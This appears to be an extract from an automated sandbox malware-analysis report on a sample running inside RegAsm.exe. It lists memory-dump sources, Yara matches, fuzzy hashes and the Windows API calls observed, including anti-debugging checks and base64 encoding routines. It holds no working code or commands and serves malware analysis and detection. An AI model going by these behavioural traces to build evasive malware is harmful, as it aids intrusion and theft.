                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptString$memset
                                                                                                                                                                                                                                                              • String ID: UNK
                                                                                                                                                                                                                                                              • API String ID: 1505698593-448974810
                                                                                                                                                                                                                                                              • Opcode ID: 62b9d19b6a11a79744d04796c1f85149cd126a538d96f4649f8111959ccd7188
                                                                                                                                                                                                                                                              • Instruction ID: 9f21ffb8b814cbdb48cbc3b41153ece4c9f4a257cb6628d7501e8ee4f46469c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62b9d19b6a11a79744d04796c1f85149cd126a538d96f4649f8111959ccd7188
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E00167F260015CBEE711EA95DE81DFF77ACDB44654F00007BB604A2181E6F4EE458A78
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 199C48A7
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 199C4973
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 199C4993
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 199C499D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                                              • Opcode ID: c9d4716c4ae106ab71c2cde1bb114a0fc21f2dff85fab51045de3955d890b61b
                                                                                                                                                                                                                                                              • Instruction ID: 9f320eb4222849be22b10c72f2b73257cb60299f867ebd1cd42a93da02f39d0a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9d4716c4ae106ab71c2cde1bb114a0fc21f2dff85fab51045de3955d890b61b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80311875D0126C9BDB11DFA5C989BCCBBB8AF08704F1041AAE44DAB280EB759A85CF05
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F852
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,004043C8,?,?,?,?,?,?), ref: 0040F85F
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,004043C8,?,?,?,?,?,?), ref: 0040F866
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1871034439-0
                                                                                                                                                                                                                                                              • Opcode ID: 77c4e192cfc07588887914397eec6378b67b364821b17ba415bff07f9bdaf23d
                                                                                                                                                                                                                                                              • Instruction ID: ac9393c850f434343fc82b96a5b52d3fd0e9389ef2404fd1dbb9cfc5d77e508d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77c4e192cfc07588887914397eec6378b67b364821b17ba415bff07f9bdaf23d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55015732500209BFDF219F61DC488AB7BAEEF49360B108439F801A3260D7359C51EBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                                              • Opcode ID: c6a24e54a40c657710bafd801b3af3228f2ec70fa5c85ff84f724536ac891562
                                                                                                                                                                                                                                                              • Instruction ID: 9d0b56530ffa0ea51232b36620d4ac7d0a45882450ef97ec5236ac9745e425cd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6a24e54a40c657710bafd801b3af3228f2ec70fa5c85ff84f724536ac891562
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01E870101224BFCB215F66DC88E8B7FB9FF4ABA1B104056F90AA6254D3719910DBE4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                                                                              • Instruction ID: e30365a949857b8accd5d30b167b09544720c94a6d3af0377d1f552827ecdd50
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2E0923A004780BBCB225B55DC85E4ABBA6BF48314F589C1CF68561470C6A2A8E6EB41
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                                                                              • Instruction ID: dc8951e85de2c1e6f7499b69a4da627be26416e02c72ac242db8ea0278464100
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AE0923A004700BBCA225B54DE86E4ABBA6BF48B10F589C1CF6C521670C662A8A4EB41
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 198C597E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                                                                                                                                                                                                                              • API String ID: 0-143322027
                                                                                                                                                                                                                                                              • Opcode ID: 99ac8b8ff7ac20fd44a7fc33c61a9c6408ea2003c3c51453c767e40f8320c326
                                                                                                                                                                                                                                                              • Instruction ID: 7b8845c88417f03955967f0393a34c1911c844c092ef92c4ea3c32072a75fc3b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ac8b8ff7ac20fd44a7fc33c61a9c6408ea2003c3c51453c767e40f8320c326
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B1159BA500206BFDB109F58CC84F86BBADFF49714F488159F5089B291C3B6F5A4CBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 022da73ef9ef391700bca6df03e86d466c6f76eaf4e92ed060027de2a8f998af
                                                                                                                                                                                                                                                              • Instruction ID: 2dfd4959d73ff1736015b851603418983f939dc157fa794f30856bb020022697
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 022da73ef9ef391700bca6df03e86d466c6f76eaf4e92ed060027de2a8f998af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E3157B4600305AFE704DF69EC85E66B3EAFF58214F08852CF948D3681E776F951CAA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d08ad06df863ba2e1d68c081e726f34128eb9525d6de71427afecbf59a97b0ab
                                                                                                                                                                                                                                                              • Instruction ID: 79bb88382db4895a258251e49ead637aeaced55b2a1eb3bf36c5ee2220c18ed8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d08ad06df863ba2e1d68c081e726f34128eb9525d6de71427afecbf59a97b0ab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D319AB5608301AFEB108F2ADC84F5777E9EF94344F18882CF8468B291E771E954CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040AB38
                                                                                                                                                                                                                                                                • Part of subcall function 0040AA42: _EH_prolog.MSVCRT ref: 0040AA47
                                                                                                                                                                                                                                                                • Part of subcall function 0040AA42: lstrlen.KERNEL32(?,00000001,75AA5460,00000000), ref: 0040AA65
                                                                                                                                                                                                                                                                • Part of subcall function 0040AA42: strchr.MSVCRT ref: 0040AA7B
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,6CD67FA0,75AA5460,00000000), ref: 0040AB83
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040AB8A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AB9F
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040ABA6
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040ABC8
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040ABD9
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040ABE0
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AC0A
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AC11
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0040AC1C
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040AC23
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC38
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AC3F
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040AC5E
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC6F
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AC76
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AC95
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AC9C
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0040ACA7
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040ACAE
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040ACC3
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040ACCA
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040ACE1
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040ACF2
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040ACF9
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD1E
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AD25
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0040AD30
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040AD37
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AD4F
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AD56
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040AD75
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AD86
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AD8D
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AD94
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040ADA6
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040ADAD
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040ADC4
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040ADEB
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE03
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AE0A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040AE13
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040AE22
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040AE29
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE39
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AE40
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040AE52
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE5E
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AE65
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AE8B
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AE92
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0040AE9D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040AEA4
                                                                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0040AEBB
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AECC
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AED3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040AF39
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 0040AF49
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AF80
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AF87
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AFD2
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040AFD9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
